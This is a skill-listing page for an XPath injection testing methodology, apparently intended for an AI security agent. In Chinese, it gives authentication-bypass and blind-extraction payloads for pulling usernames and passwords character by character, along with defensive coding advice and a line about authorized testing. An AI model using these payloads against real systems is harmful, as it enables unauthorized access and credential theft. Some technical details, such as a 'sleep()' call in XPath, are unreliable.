Vibe Index
🎯

xpath-injection-testing

🎯Skill

from ed1s0nz/cyberstrikeai

VibeIndex|
What it does

Systematically tests and exploits XPath injection vulnerabilities by crafting malicious queries to bypass authentication and extract sensitive information.

📦

Part of

ed1s0nz/cyberstrikeai(11 items)

xpath-injection-testing

Installation

git cloneClone repository
git clone https://github.com/Ed1s0nZ/CyberStrikeAI.git
GoRun with Go
go run cmd/server/main.go
GoRun with Go
go build -o cyberstrike-ai-mcp cmd/mcp-stdio/main.go
Claude Desktop ConfigurationAdd this to your claude_desktop_config.json
{ "mcpServers": { "cyberstrike-ai": { "command": "/absolute...
📖 Extracted from docs: ed1s0nz/cyberstrikeai
Need more details? View full documentation on GitHub
1Installs
-
AddedFeb 4, 2026
View on GitHubBack to Skills

Skill Details

SKILL.md

XPath注入漏洞测试的专业技能和方法论

Overview

# XPath注入漏洞测试

概述

XPath注入是一种类似于SQL注入的漏洞,利用XPath查询语句的构造缺陷,可能导致信息泄露、认证绕过等。本技能提供XPath注入的检测、利用和防护方法。

漏洞原理

应用程序将用户输入直接拼接到XPath查询语句中,未进行充分验证和过滤,导致攻击者可以修改查询逻辑。

危险代码示例:

```java

String xpath = "//user[username='" + username + "' and password='" + password + "']";

XPathExpression expr = xpath.compile(xpath);

NodeList nodes = (NodeList) expr.evaluate(doc, XPathConstants.NODESET);

```

XPath基础

查询语法

基础查询:

```

//user[username='admin']

//user[@id='1']

//user[username='admin' and password='pass']

//user[username='admin' or username='user']

```

函数

常用函数:

  • text() - 获取文本内容
  • count() - 计数
  • substring() - 子字符串
  • string-length() - 字符串长度
  • contains() - 包含检查

测试方法

1. 识别XPath输入点

常见功能:

  • 用户登录
  • 数据搜索
  • XML数据查询
  • 配置查询

2. 基础检测

测试特殊字符:

```

' or '1'='1

' or '1'='1' or '

' or 1=1 or '

') or ('1'='1

```

测试逻辑操作符:

```

' or '1'='1

' and '1'='2

' or 1=1 or '

```

3. 认证绕过

基础绕过:

```

用户名: admin' or '1'='1

密码: anything

查询: //user[username='admin' or '1'='1' and password='anything']

```

更精确的绕过:

```

用户名: admin') or ('1'='1

查询: //user[username='admin') or ('1'='1' and password='*']

```

4. 信息泄露

枚举用户:

```

' or 1=1 or '

' or '1'='1

') or 1=1 or ('

```

获取节点数量:

```

' or count(//user)>0 or '

```

获取特定节点:

```

' or substring(//user[1]/username,1,1)='a' or '

```

利用技术

认证绕过

方法1:逻辑绕过

```

输入: admin' or '1'='1

查询: //user[username='admin' or '1'='1' and password='*']

结果: 匹配所有用户

```

方法2:注释绕过

```

输入: admin')] | // | //[('

查询: //user[username='admin')] | // | //[('' and password='*']

```

方法3:布尔盲注

```

' or substring(//user[1]/username,1,1)='a' or '

' or substring(//user[1]/username,1,1)='b' or '

```

信息泄露

枚举所有用户:

```

' or 1=1 or '

结果: 返回所有用户节点

```

获取用户名:

```

' or substring(//user[1]/username,1,1)='a' or '

' or substring(//user[1]/username,2,1)='d' or '

逐步获取每个字符

```

获取密码:

```

' or substring(//user[1]/password,1,1)='p' or '

逐步获取密码字符

```

盲注技术

基于时间的盲注:

```

' or count(//user[substring(username,1,1)='a'])>0 and sleep(5) or '

```

基于布尔值的盲注:

```

' or substring(//user[1]/username,1,1)='a' or '

观察响应差异

```

绕过技术

编码绕过

URL编码:

```

' or '1'='1 → %27%20or%20%271%27%3D%271

```

HTML实体编码:

```

' → '

" → "

< → <

> → >

```

注释绕过

使用注释:

```

' or 1=1 or '

' or '1'='1' or '

```

函数绕过

使用不同函数:

```

substring(//user[1]/username,1,1)

substring(//user[position()=1]/username,1,1)

//user[1]/username/text()[1]

```

工具使用

XPath表达式测试

在线工具:

  • XPath Tester
  • XMLSpy
  • Oxygen XML Editor

Burp Suite

  1. 拦截XPath查询请求
  2. 修改查询参数
  3. 观察响应结果

Python脚本

```python

from lxml import etree

from lxml.etree import XPath

# 加载XML文档

doc = etree.parse('users.xml')

# 测试注入

xpath_expr = "//user[username='admin' or '1'='1']"

xpath = XPath(xpath_expr)

results = xpath(doc)

print(results)

```

验证和报告

验证步骤

  1. 确认可以控制XPath查询
  2. 验证认证绕过或信息泄露
  3. 评估影响(未授权访问、数据泄露等)
  4. 记录完整的POC

报告要点

  • 漏洞位置和输入参数
  • XPath查询构造方式
  • 完整的利用步骤和PoC
  • 修复建议(输入验证、参数化查询等)

防护措施

推荐方案

  1. 输入验证

```java

private static final String[] XPATH_ESCAPE_CHARS =

{"'", "\"", "[", "]", "(", ")", "=", ">", "<", " "};

public static String escapeXPath(String input) {

if (input == null) {

return null;

}

StringBuilder sb = new StringBuilder();

for (int i = 0; i < input.length(); i++) {

char c = input.charAt(i);

if (Arrays.asList(XPATH_ESCAPE_CHARS).contains(String.valueOf(c))) {

sb.append("\\");

}

sb.append(c);

}

return sb.toString();

}

```

  1. 参数化查询

```java

// 使用XPath变量

String xpath = "//user[username=$username and password=$password]";

XPathExpression expr = xpath.compile(xpath);

XPathVariableResolver resolver = new MapVariableResolver(

Map.of("username", escapedUsername, "password", escapedPassword));

expr.setXPathVariableResolver(resolver);

```

  1. 白名单验证

```java

// 只允许特定字符

if (!input.matches("^[a-zA-Z0-9@._-]+$")) {

throw new IllegalArgumentException("Invalid input");

}

```

  1. 使用预编译查询

```java

// 预定义查询模板

private static final String LOGIN_QUERY =

"//user[username=$1 and password=$2]";

// 使用参数绑定

```

  1. 最小权限

- 限制XPath查询范围

- 使用访问控制

- 限制可查询的节点

注意事项

  • 仅在授权测试环境中进行
  • 注意不同XPath版本的语法差异
  • 测试时避免对XML数据造成影响
  • 了解目标应用的XPath实现

More from this repository10

🎯
xxe-testing🎯Skill

Identifies and validates XML External Entity (XXE) vulnerabilities in web applications through automated scanning and payload generation

🎯
xss-testing🎯Skill

Performs comprehensive XSS vulnerability testing across reflected, stored, and DOM-based attack vectors using advanced payload techniques and scanning tools.

🎯
security-automation🎯Skill

Automates security processes like vulnerability scanning, testing, incident response, and compliance checks across different tools and platforms.

🎯
idor-testing🎯Skill

Automates testing for Insecure Direct Object Reference (IDOR) vulnerabilities by systematically probing web application endpoints for unauthorized access.

🎯
ssrf-testing🎯Skill

Probes web applications for Server-Side Request Forgery (SSRF) vulnerabilities by testing various payload injection techniques and network request scenarios.

🎯
csrf-testing🎯Skill

Performs comprehensive Cross-Site Request Forgery (CSRF) vulnerability testing and detection across web applications and endpoints.

🎯
api-security-testing🎯Skill

Performs comprehensive API security testing by scanning endpoints, identifying vulnerabilities, and generating detailed security assessment reports.

🎯
sql-injection-testing🎯Skill

I apologize, but I cannot generate a description without seeing the actual context or details about the "sql-injection-testing" skill. Could you provide more information about what this specific sk...

🎯
network-penetration-testing🎯Skill

Conducts comprehensive network penetration testing by systematically scanning, identifying vulnerabilities, and exploiting potential security weaknesses in network infrastructure.

🎯
file-upload-testing🎯Skill

Uploads and tests file integrity, validating document types, scanning for potential security risks during file transfer processes.